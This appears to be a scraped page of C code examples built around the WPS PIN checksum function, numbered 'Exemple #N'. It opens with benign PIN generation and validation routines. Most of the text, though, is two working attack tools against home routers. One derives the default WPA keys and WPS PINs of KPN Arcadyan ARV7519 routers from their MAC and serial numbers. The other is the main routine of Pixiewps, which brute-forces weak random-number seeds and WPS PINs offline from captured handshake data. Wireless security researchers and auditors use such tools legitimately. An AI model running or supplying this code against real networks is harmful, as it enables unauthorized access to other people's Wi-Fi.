/**
 * wps_generate_pin - Generate a random PIN
 * Returns: Eight digit PIN (i.e., including the checksum digit)
 */
int wps_generate_pin(unsigned int *pin)
{
	unsigned int val;

	/* Generate seven random digits for the PIN */
	if (random_get_bytes((unsigned char *) &val, sizeof(val)) < 0)
		return -1;
	val %= 10000000;

	/* Append checksum digit */
	*pin = val * 10 + wps_pin_checksum(val);
	return 0;
}
Exemple #2
0
/**
 * wps_generate_pin - Generate a random PIN
 * Returns: Eight digit PIN (i.e., including the checksum digit)
 */
unsigned int wps_generate_pin(void)
{
	unsigned int val;

	/* Generate seven random digits for the PIN */
	if (random_get_bytes((unsigned char *) &val, sizeof(val)) < 0) {
		struct os_time now;
		os_get_time(&now);
		val = os_random() ^ now.sec ^ now.usec;
	}
	val %= 10000000;

	/* Append checksum digit */
	return val * 10 + wps_pin_checksum(val);
}
void p2p_pincode(struct p2p *p, char *ins_no, char *ins_no_again)
{
	int pin_check=0;
	p->p2p_get=0;
	ui_screen(p);
	printf("%s", ins_no);
	scanf("%d",&pin_check);
	while( wps_pin_checksum(pin_check) != 0 )
	{
		ui_screen(p);
		printf("%s", ins_no_again);	
		scanf("%d",&pin_check);
	}
	p->pin = pin_check;
}
int is_valid_pin(char *pin)
{
    if(!pin)
        return 0;

    int i;
    for (i = 0; i < strlen(pin); i++)
    {
         if(!isdigit(pin[i]))
             return 0;
    }
    if(strlen(pin) == 8)
    {
        char pin7[8] = { 0 };
        char pin8[9] = { 0 };
        memcpy((void *) &pin7, pin, sizeof(pin7)-1);
        snprintf(pin8, 9, "%s%d", pin7, wps_pin_checksum(atoi(pin7)));
        if (strcmp(pin, pin8) != 0)
            return 0;
    }
    return 1;
}
Exemple #5
0
/* Builds a WPS PIN from the key tables */
char *build_wps_pin()
{
        char *key = NULL, *pin = NULL;
        int pin_len = PIN_SIZE + 1;

        pin = malloc(pin_len);
        key = malloc(pin_len);
        if(pin && key)
        {
                memset(key, 0, pin_len);
                memset(pin, 0, pin_len);

                /* Generate a 7-digit pin from the given key index values */
                snprintf(key, pin_len, "%s%s", get_p1(get_p1_index()), get_p2(get_p2_index()));

                /* Generate and append the pin checksum digit */
                snprintf(pin, pin_len, "%s%d", key, wps_pin_checksum(atoi(key)));

                free(key);
        }

        return pin;
}
Exemple #6
0
/**
 * wps_pin_valid - Check whether a PIN has a valid checksum
 * @pin: Eight digit PIN (i.e., including the checksum digit)
 * Returns: 1 if checksum digit is valid, or 0 if not
 */
unsigned int wps_pin_valid(unsigned int pin)
{
	return wps_pin_checksum(pin / 10) == (pin % 10);
}
int main (int argc, char *argv[]) {
int opt = 0;
int chs = 0;
unsigned int mac_1, mac_2, mac_3, mac_4, mac_5, mac_6;
unsigned int m7, m8, m9, m10, m11, m12;
long ss, se;
char *mac = "00:11:22:33:44:55";
char *s_start = "1";
char *s_end = "99999";
char *ke;
int smac;
char smacs[5];
unsigned int s6, s7, s8, s9, s10, k1, k2, x1, x2, x3, y1, y2, y3, z1, z2, z3;
char *ptr;
char *wpa = "000000000000";
char  wpac[12],wpad;
int go = 0;

while ((opt = getopt(argc, argv, "m:v:s:e:?:")) != -1) {
    switch(opt) {
        case 'm':
            mac = optarg;
            chs = 0;
            go++;
        break;

        case 'v':
            chs = 1;
        break;

        case 's':
            s_start = optarg;
            s_end = s_start;
        break;

        case 'e':
            s_end = optarg;
        break;

        case '?':
            printf("\nparameters/usage:\n");
            printf("\n-m [required]: MAC-address of router");
            printf("\n-s [optional]: range start for last 5 digits of serial#. (Also use this to generate WPA key for just one unique serial#)");
            printf("\n-e [optional]: range end for serial# (max. 99999)");
            printf("\n-v [optional]: verbose  - outputs serial# , WPA-key and WPS pin");
            printf("\n\nexample 1: kpn_ARV7519WPA -m 74:31:70:BA:BA:A9\n");
            printf("\nexample 2: kpn_ARV7519WPA -s 85894 -m 00:00:00:B8:68:21 -v 0\n\n");
        break;
        }
}

if (go == 1) {
printf("\nWPA/WPS Generator for KPN Arcadyan ARV7519 routers\n");

sscanf(mac, "%2X:%2X:%2X:%2X:%2X:%2X", &mac_1, &mac_2, &mac_3, &mac_4, &mac_5, &mac_6);
printf("Generating WPA keys for SSID: ARV7519%2X%2X%2X [MAC : %s]\n", mac_4, mac_5, mac_6, mac );
printf("serial# range [last digits] from %s to %s \n\n" , s_start , s_end);
ss = strtol(s_start, &ptr, 10);
if (ss < 1) ss = 1;
if (ss > 99998) ss = 99999;
se = strtol(s_end, &ptr, 10);
if (se < ss) se = ss;
if (se > 99998) se = 99999;

m7 = mac_4 >> 4 & 0x0f;
m8 = mac_4 & 0x0f;
m9 = mac_5 >> 4 & 0x0f;
m10 = mac_5 & 0x0f;
m11 = mac_6 >> 4 & 0x0f;
m12 = mac_6 & 0x0f;

for ( smac = ss ; smac <= se ; smac++){
        sprintf(smacs, "%05d", smac);
        s6 = smacs[0] - '0';
        s7 = smacs[1] - '0';
        s8 = smacs[2] - '0';
        s9 = smacs[3] - '0';
        s10 = smacs[4] - '0';
        k1 = (s7 + s8 + m11 + m12) & 0x0f;
        k2 = (m9 + m10 +s9 + s10) & 0x0f;
        x1 = k1 ^ s10;
        x2 = k1 ^ s9;
        x3 = k1 ^ s8;
        y1 = k2 ^ m10;
        y2 = k2 ^ m11;
        y3 = k2 ^ m12;
        z1 = m11 ^ s10;
        z2 = m12 ^ s9;
        z3 = k1 ^ k2;

        if (chs == 0) printf("%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X\n", x1,y1,z1,s6,x2,y2,z2,k2,x3,y3,z3,k1);

        if (chs == 1) {
                int pin;
                char pinhex[7];
                sprintf(pinhex, "%1X%1X%1X%1X%1X%1X%1X", x1,x2,y1,y2,z1,z2,x3);
                sscanf(pinhex, "%x", &pin);
                pin = pin % 10000000;
                printf("Serial# J....%5d - WPA key: %1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X - WPS pin: %07d%d\n", smac, x1,y1,z1,s6,x2,y2,z2,k2,x3,y3,z3,k1,pin, wps_pin_checksum(pin));
                }
        }

 }
Exemple #8
0
int main(int argc, char **argv) {

	struct global *wps;
	if ((wps = calloc(1, sizeof(struct global)))) {
		wps->pke     = 0;
		wps->pkr     = 0;
		wps->e_hash1 = 0;
		wps->e_hash2 = 0;
		wps->authkey = 0;
		wps->e_nonce = 0;
		wps->r_nonce = 0;
		wps->e_bssid = 0;
		wps->psk1    = 0;
		wps->psk2    = 0;
		wps->dhkey   = 0;
		wps->kdk     = 0;
		wps->wrapkey = 0;
		wps->emsk    = 0;
		wps->e_s1    = 0;
		wps->e_s2    = 0;
		wps->bruteforce = false;
		wps->verbosity = 2;
		wps->error = calloc(256, 1); if (!wps->error) goto memory_err;
		wps->error[0] = '\n';
	} else {
		memory_err:
			fprintf(stderr, "\n [X] Memory allocation error!\n");
			return MEM_ERROR;
	}

	int opt = 0;
	int long_index = 0;
	opt = getopt_long(argc, argv, option_string, long_options, &long_index);

	while (opt != -1) {
		switch (opt) {
			case 'e':
				wps->pke = malloc(WPS_PUBKEY_LEN);
				if (!wps->pke)
					goto memory_err;
				if (hex_string_to_byte_array(optarg, wps->pke, WPS_PUBKEY_LEN)) {
					snprintf(wps->error, 256, "\n [!] Bad enrollee public key -- %s\n\n", optarg);
					goto usage_err;
				}
				break;
			case 'r':
				wps->pkr = malloc(WPS_PUBKEY_LEN);
				if (!wps->pkr)
					goto memory_err;
				if (hex_string_to_byte_array(optarg, wps->pkr, WPS_PUBKEY_LEN)) {
					snprintf(wps->error, 256, "\n [!] Bad registrar public key -- %s\n\n", optarg);
					goto usage_err;
				}
				break;
			case 's':
				wps->e_hash1 = malloc(WPS_HASH_LEN);
				if (!wps->e_hash1)
					goto memory_err;
				if (hex_string_to_byte_array(optarg, wps->e_hash1, WPS_HASH_LEN)) {
					snprintf(wps->error, 256, "\n [!] Bad hash -- %s\n\n", optarg);
					goto usage_err;
				}
				break;
			case 'z':
				wps->e_hash2 = malloc(WPS_HASH_LEN);
				if (!wps->e_hash2)
					goto memory_err;
				if (hex_string_to_byte_array(optarg, wps->e_hash2, WPS_HASH_LEN)) {
					snprintf(wps->error, 256, "\n [!] Bad hash -- %s\n\n", optarg);
					goto usage_err;
				}
				break;
			case 'a':
				wps->authkey = malloc(WPS_AUTHKEY_LEN);
				if (!wps->authkey)
					goto memory_err;
				if (hex_string_to_byte_array(optarg, wps->authkey, WPS_HASH_LEN)) {
					snprintf(wps->error, 256, "\n [!] Bad authentication session key -- %s\n\n", optarg);
					goto usage_err;
				}
				break;
			case 'n':
				wps->e_nonce = malloc(WPS_NONCE_LEN);
				if (!wps->e_nonce)
					goto memory_err;
				if (hex_string_to_byte_array(optarg, wps->e_nonce, WPS_NONCE_LEN)) {
					snprintf(wps->error, 256, "\n [!] Bad enrollee nonce -- %s\n\n", optarg);
					goto usage_err;
				}
				break;
			case 'm':
				wps->r_nonce = malloc(WPS_NONCE_LEN);
				if (!wps->r_nonce)
					goto memory_err;
				if (hex_string_to_byte_array(optarg, wps->r_nonce, WPS_NONCE_LEN)) {
					snprintf(wps->error, 256, "\n [!] Bad registrar nonce -- %s\n\n", optarg);
					goto usage_err;
				}
				break;
			case 'b':
				wps->e_bssid = malloc(WPS_BSSID_LEN);
				if (!wps->e_bssid)
					goto memory_err;
				if (hex_string_to_byte_array(optarg, wps->e_bssid, WPS_BSSID_LEN)) {
					snprintf(wps->error, 256, "\n [!] Bad enrollee MAC address -- %s\n\n", optarg);
					goto usage_err;
				}
				break;
			case 'S':
				wps->small_dh_keys = true;
				break;
			case 'f':
				wps->bruteforce = true;
				break;
			case 'v':
				if (get_int(optarg, &wps->verbosity) != 0 || wps->verbosity < 1 || 3 < wps->verbosity) {
					snprintf(wps->error, 256, "\n [!] Bad verbosity level -- %s\n\n", optarg);
					goto usage_err;
				};
				break;
			case 'h':
				goto usage_err;
			case '?':
			default:
				fprintf(stderr, "%s -h for help\n", argv[0]);
				return ARG_ERROR;
		}
		opt = getopt_long(argc, argv, option_string, long_options, &long_index);
	}

	/* Not all required arguments have been supplied */
	if (wps->pke == 0 || wps->e_hash1 == 0 || wps->e_hash2 == 0) {
		wps->error = "\n [!] Not all required arguments have been supplied!\n\n";

		usage_err:
			fprintf(stderr, usage, VERSION, argv[0], wps->error);
			return ARG_ERROR;
	}

	/* If --dh-small is selected then no --pkr should be supplied */
	if (wps->pkr && wps->small_dh_keys) {
		wps->error = "\n [!] Options --dh-small and --pkr are mutually exclusive!\n\n";
		goto usage_err;
	}

	/* Either --pkr or --dh-small must be specified */
	if (!wps->pkr && !wps->small_dh_keys) {
		wps->error = "\n [!] Either --pkr or --dh-small must be specified!\n\n";
		goto usage_err;
	}

	if (wps->small_dh_keys) { /* Small DH keys selected */
		wps->pkr = malloc(WPS_PUBKEY_LEN);
		if (!wps->pkr)
			goto memory_err;

		/* g^A mod p = 2 (g = 2, A = 1, p > 2) */
		memset(wps->pkr, 0, WPS_PUBKEY_LEN - 1);
		wps->pkr[WPS_PUBKEY_LEN - 1] = 0x02;

		if (!wps->authkey) {
			if (wps->e_nonce) {
				if (wps->r_nonce) {
					if (wps->e_bssid) { /* Computing AuthKey */
						wps->dhkey = malloc(WPS_HASH_LEN);
						if (!wps->dhkey)
							goto memory_err;
						wps->kdk = malloc(WPS_HASH_LEN);
						if (!wps->kdk)
							goto memory_err;

						unsigned char *buffer = malloc(WPS_NONCE_LEN * 2 + WPS_BSSID_LEN);
						if (!buffer)
							goto memory_err;

						/* DHKey = SHA-256(g^(AB) mod p) = SHA-256(PKe^A mod p) = SHA-256(PKe) (g = 2, A = 1, p > 2) */
						sha256(wps->pke, WPS_PUBKEY_LEN, wps->dhkey);

						memcpy(buffer, wps->e_nonce, WPS_NONCE_LEN);
						memcpy(buffer + WPS_NONCE_LEN, wps->e_bssid, WPS_BSSID_LEN);
						memcpy(buffer + WPS_NONCE_LEN + WPS_BSSID_LEN, wps->r_nonce, WPS_NONCE_LEN);

						/* KDK = HMAC-SHA-256{DHKey}(Enrollee nonce || Enrollee MAC || Registrar nonce) */
						hmac_sha256(wps->dhkey, WPS_HASH_LEN, buffer, WPS_NONCE_LEN * 2 + WPS_BSSID_LEN, wps->kdk);

						buffer = realloc(buffer, WPS_HASH_LEN * 3);
						if (!buffer)
							goto memory_err;

						/* Key derivation function */
						kdf(wps->kdk, WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN + WPS_EMSK_LEN, buffer);

						wps->authkey = malloc(WPS_AUTHKEY_LEN);
						if (!wps->authkey)
							goto memory_err;

						memcpy(wps->authkey, buffer, WPS_AUTHKEY_LEN);
						
						if (wps->verbosity > 2) {
							wps->wrapkey = malloc(WPS_KEYWRAPKEY_LEN);
							if (!wps->wrapkey)
								goto memory_err;
							wps->emsk = malloc(WPS_EMSK_LEN);
							if (!wps->emsk)
								goto memory_err;

							memcpy(wps->wrapkey, buffer + WPS_AUTHKEY_LEN, WPS_KEYWRAPKEY_LEN);
							memcpy(wps->emsk, buffer + WPS_AUTHKEY_LEN + WPS_KEYWRAPKEY_LEN, WPS_EMSK_LEN);
						}
						if (wps->verbosity < 3) {
							free(wps->dhkey);
							free(wps->kdk);
						}
						free(buffer);
					} else {
						wps->error = "\n [!] Neither --authkey and --e-bssid have been supplied!\n\n";
						goto usage_err;
					}
				} else {
					wps->error = "\n [!] Neither --authkey and --r-nonce have been supplied!\n\n";
					goto usage_err;
				}
			} else {
				wps->error = "\n [!] Neither --authkey and --e-nonce have been supplied!\n\n";
				goto usage_err;
			}
		}
	}

	/* E-S1 = E-S2 = 0 */
	wps->e_s1 = calloc(WPS_SECRET_NONCE_LEN, 1); if (!wps->e_s1) goto memory_err;
	wps->e_s2 = calloc(WPS_SECRET_NONCE_LEN, 1); if (!wps->e_s2) goto memory_err;

	/* Allocating memory for digests */
	wps->psk1 = malloc(WPS_HASH_LEN); if (!wps->psk1) goto memory_err;
	wps->psk2 = malloc(WPS_HASH_LEN); if (!wps->psk2) goto memory_err;

	unsigned char *result = (unsigned char *) malloc(WPS_HASH_LEN);
	if (!result)
		goto memory_err;
	unsigned char *buffer = (unsigned char *) malloc(WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2);
	if (!buffer)
		goto memory_err;

	uint32_t seed;
	uint32_t print_seed; /* Seed to display at the end */
	unsigned int first_half;
	unsigned int second_half;
	unsigned char s_pin[4] = {0};
	bool valid = false;

	int mode = 1; bool found = false;
	struct timeval t0, t1;

	gettimeofday(&t0, 0);

	while (mode <= MAX_MODE && !found) {

		seed = 0; print_seed = 0;

		/* ES-1 = ES-2 = E-Nonce */
		if (mode == 2 && wps->e_nonce) {
			memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN);
			memcpy(wps->e_s2, wps->e_nonce, WPS_SECRET_NONCE_LEN);
		}

		/* PRNG bruteforce (rand_r) */
		if (mode == 3 && wps->e_nonce) {

			/* Reducing entropy from 32 to 25 bits */
			uint32_t index = wps->e_nonce[0] << 25;
			uint32_t limit = index | 0x01ffffff;

			while (1) {
				seed = index;

				int i;
				for (i = 1; i < WPS_NONCE_LEN; i++) {
					if (wps->e_nonce[i] != (unsigned char) rand_r(&seed)) break;
				}

				if (i == WPS_NONCE_LEN) { /* Seed found */
					print_seed = seed;

					/* Advance to get ES-1 */
					for (i = 0; i < WPS_SECRET_NONCE_LEN; i++)
						wps->e_s1[i] = (unsigned char) rand_r(&seed);

					/* Advance to get ES-2 */
					for (i = 0; i < WPS_SECRET_NONCE_LEN; i++)
						wps->e_s2[i] = (unsigned char) rand_r(&seed);

					break;
				}

				if (index == limit) break; /* Complete bruteforce exausted */

				index++;
			}
		}

		/* PRNG bruteforce (random_r) */
		if (mode == 4 && wps->e_nonce) {

			/* Checks if the sequence may actually be generated by current random function */
			if (wps->e_nonce[0] < 0x80 && wps->e_nonce[4] < 0x80 && wps->e_nonce[8] < 0x80  && wps->e_nonce[12] < 0x80) {

				valid = true;

				/* Converting enrollee nonce to the sequence may be generated by current random function */
				uint32_t randr_enonce[4] = {0};
				int j = 0;
				for (int i = 0; i < 4; i++) {
					randr_enonce[i] |= wps->e_nonce[j++];
					randr_enonce[i] <<= 8;
					randr_enonce[i] |= wps->e_nonce[j++];
					randr_enonce[i] <<= 8;
					randr_enonce[i] |= wps->e_nonce[j++];
					randr_enonce[i] <<= 8;
					randr_enonce[i] |= wps->e_nonce[j++];
				}

				uint32_t limit;
				struct timeval curr_time;
				gettimeofday(&curr_time, 0);

				if (wps->bruteforce) {
					seed = curr_time.tv_sec + SEC_PER_DAY * MODE4_DAYS - SEC_PER_HOUR * 2;
					limit = 0;
				} else {
					seed = curr_time.tv_sec + SEC_PER_HOUR * 2;
					limit = curr_time.tv_sec - SEC_PER_DAY * MODE4_DAYS - SEC_PER_HOUR * 2;
				}

				struct random_data *buf = (struct random_data *) calloc(1, sizeof(struct random_data));
				char *rand_statebuf = (char *) calloc(1, 128);
				initstate_r(seed, rand_statebuf, 128, buf);
				int32_t res = 0;

				while (1) {
					srandom_r(seed, buf);

					int i;
					for (i = 0; i < 4; i++) {
						random_r(buf, &res);
						if (res != randr_enonce[i]) break;
					}

					if (i == 4) {
						print_seed = seed;
						srandom_r(print_seed + 1, buf);
						for (int i = 0; i < 4; i++) {
							random_r(buf, &res);
							uint32_t be = __be32_to_cpu(res);
							memcpy(&(wps->e_s1[4 * i]), &be, 4);
							memcpy(wps->e_s2, wps->e_s1, WPS_SECRET_NONCE_LEN); /* ES-1 = ES-2 != E-Nonce */
						}
					}

					if (print_seed || seed == limit) {
						free(buf);
						free(rand_statebuf);
						break;
					}

					seed--;
				}
			}
		}

		/* WPS pin cracking */
		if (mode == 1 || (mode == 2 && wps->e_nonce) || (mode == 3 && print_seed) || (mode == 4 && print_seed)) {
crack:
			first_half = 0; second_half = 0;

			while (first_half < 10000) {
				uint_to_char_array(first_half, 4, s_pin);
				hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, (unsigned char *) s_pin, 4, wps->psk1);
				memcpy(buffer, wps->e_s1, WPS_SECRET_NONCE_LEN);
				memcpy(buffer + WPS_SECRET_NONCE_LEN, wps->psk1, WPS_PSK_LEN);
				memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN, wps->pke, WPS_PUBKEY_LEN);
				memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN, wps->pkr, WPS_PUBKEY_LEN);
				hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, buffer, WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2, result);

				if (memcmp(result, wps->e_hash1, WPS_HASH_LEN)) {
					first_half++;
				} else {
					break;
				}
			}

			if (first_half < 10000) { /* First half found */
				unsigned char checksum_digit;
				unsigned int c_second_half;

				/* Testing with checksum digit */
				while (second_half < 1000) {
					checksum_digit = wps_pin_checksum(first_half * 1000 + second_half);
					c_second_half = second_half * 10 + checksum_digit;
					uint_to_char_array(c_second_half, 4, s_pin);
					hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, (unsigned char *) s_pin, 4, wps->psk2);
					memcpy(buffer, wps->e_s2, WPS_SECRET_NONCE_LEN);
					memcpy(buffer + WPS_SECRET_NONCE_LEN, wps->psk2, WPS_PSK_LEN);
					memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN, wps->pke, WPS_PUBKEY_LEN);
					memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN, wps->pkr, WPS_PUBKEY_LEN);
					hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, buffer, WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2, result);

					if (memcmp(result, wps->e_hash2, WPS_HASH_LEN)) {
						second_half++;
					} else {
						second_half = c_second_half;
						found = true;
						break;
					}
				}

				/* Testing without checksum digit */
				if (!found) {
					second_half = 0;

					while (second_half < 10000) {

						/* If already tested skip */
						if (wps_pin_valid(first_half * 10000 + second_half)) {
							second_half++;
							continue;
						}

						uint_to_char_array(second_half, 4, s_pin);
						hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, (unsigned char *) s_pin, 4, wps->psk2);
						memcpy(buffer, wps->e_s2, WPS_SECRET_NONCE_LEN);
						memcpy(buffer + WPS_SECRET_NONCE_LEN, wps->psk2, WPS_PSK_LEN);
						memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN, wps->pke, WPS_PUBKEY_LEN);
						memcpy(buffer + WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN, wps->pkr, WPS_PUBKEY_LEN);
						hmac_sha256(wps->authkey, WPS_AUTHKEY_LEN, buffer, WPS_SECRET_NONCE_LEN + WPS_PSK_LEN + WPS_PUBKEY_LEN * 2, result);

						if (memcmp(result, wps->e_hash2, WPS_HASH_LEN)) {
							second_half++;
						} else {
							found = true;
							break;
						}
					}
				}
			}
		}

		/* E-S1 = E-Nonce != E-S2 */
		if (mode == 4 && print_seed && !found) {
			memcpy(wps->e_s1, wps->e_nonce, WPS_SECRET_NONCE_LEN);
			mode++;
			goto crack;
		}

		mode++;
	}

	gettimeofday(&t1, 0);
	long elapsed_s = t1.tv_sec - t0.tv_sec;
	mode--;

	printf("\n Pixiewps %s\n", VERSION);

	if (found) {
		if (wps->e_nonce) {
			if ((mode == 3 || mode == 4) && wps->verbosity > 2) {
				printf("\n [*] PRNG Seed:  %u", print_seed);
			}
			if (mode == 4 && wps->verbosity > 2) {
				time_t seed_time;
				struct tm ts;
				char buffer[30];

				seed_time = print_seed;
				ts = *localtime(&seed_time);
				strftime(buffer, 30, "%c", &ts);
				printf(" (%s)", buffer);
			}
		}
		if (wps->verbosity > 2) {
			if (wps->dhkey) { /* To see if AuthKey was supplied or not */
				printf("\n [*] DHKey:      "); byte_array_print(wps->dhkey, WPS_HASH_LEN);
				printf("\n [*] KDK:        "); byte_array_print(wps->kdk, WPS_HASH_LEN);
				printf("\n [*] AuthKey:    "); byte_array_print(wps->authkey, WPS_AUTHKEY_LEN);
				printf("\n [*] EMSK:       "); byte_array_print(wps->emsk, WPS_EMSK_LEN);
				printf("\n [*] KeyWrapKey: "); byte_array_print(wps->wrapkey, WPS_KEYWRAPKEY_LEN);
			}
			printf("\n [*] PSK1:       "); byte_array_print(wps->psk1, WPS_PSK_LEN);
			printf("\n [*] PSK2:       "); byte_array_print(wps->psk2, WPS_PSK_LEN);
		}
		if (wps->verbosity > 1) {
			printf("\n [*] E-S1:       "); byte_array_print(wps->e_s1, WPS_SECRET_NONCE_LEN);
			printf("\n [*] E-S2:       "); byte_array_print(wps->e_s2, WPS_SECRET_NONCE_LEN);
		}
		printf("\n [+] WPS pin:    %04u%04u", first_half, second_half);
	} else {
		printf("\n [-] WPS pin not found!");
	}
	printf("\n\n [*] Time taken: %lu s\n\n", elapsed_s);

	if (!found && mode == 4 && valid && !wps->bruteforce) {
		printf(" [!] The AP /might be/ vulnerable to mode 4. Try again with --force or with another (newer) set of data.\n\n");
	}

	free(result);
	free(buffer);

	free(wps->pke);
	free(wps->pkr);
	free(wps->e_hash1);
	free(wps->e_hash2);
	free(wps->authkey);
	free(wps->e_nonce);
	free(wps->r_nonce);
	free(wps->e_bssid);
	free(wps->psk1);
	free(wps->psk2);
	free(wps->e_s1);
	free(wps->e_s2);
	free(wps->error);

	if (wps->verbosity > 2) {
		free(wps->dhkey);
		free(wps->kdk);
		free(wps->wrapkey);
		free(wps->emsk);
	}

	free(wps);

	return (!found); /* 0 success, 1 failure */
}